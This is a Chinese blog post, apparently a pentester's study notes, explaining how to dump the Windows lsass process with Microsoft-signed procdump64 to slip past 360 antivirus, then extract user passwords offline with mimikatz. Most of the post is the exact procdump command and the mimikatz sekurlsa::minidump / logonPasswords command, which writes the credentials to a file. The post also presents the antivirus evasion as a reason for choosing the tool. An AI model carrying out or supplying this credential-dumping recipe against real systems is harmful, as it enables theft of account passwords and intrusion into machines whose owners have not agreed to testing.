通过procdump64+mimikatz导出lsass获取windows用户密码 - JunMo博客

JunMo的博客

2019
记录生活
首页 » 学习笔记 » 通过procdump64+mimikatz导出lsass获取windows用户密码

通过procdump64+mimikatz导出lsass获取windows用户密码

前言

最近在渗透时遇到一个情况,system权限有360不能查看其他目录,然后就有了接下来故事。

一开始是尝试mimikatz想去读取密码无奈被杀,无法上传mimikatz工具到目标服务器时,可以利用procdump把lsass进程的内存文件导出本地,再在本地利用mimikatz读取密码。

使用procdump,因为是微软的软件,有微软的签名证书,杀软不会拦截。

procdump下载地址

导出lsass

系统为Windows Server 2008 R2 Enterprise Edition Service Pack 1

将procdump64.exe上传到服务器上执行,需要管理员权限

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

执行完成后会在当前文件夹上有一个lsass.dmp文件

读取密码

然后将lsass.dmp拉到相同的系统里面,我这里虚拟机已经新建好了一个 Windows Server 2008 R2 Enterprise

然后运行mimikatz,将读取到的密码导出

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit >pass.txt

文章如无特别注明均为原创!
本文作者: JunMo
转载或复制请带上本文地址 http://mo60.cn/post-53.html
并注明出处 JunMo博客
原文地址《 通过procdump64+mimikatz导出lsass获取windows用户密码
发布于2019-8-2
收录状态: [百度已收录][360未收录]

分享到:


打赏

评论

游客

看不清楚?点图切换

切换注册

登录

您也可以使用第三方帐号快捷登录

切换登录

注册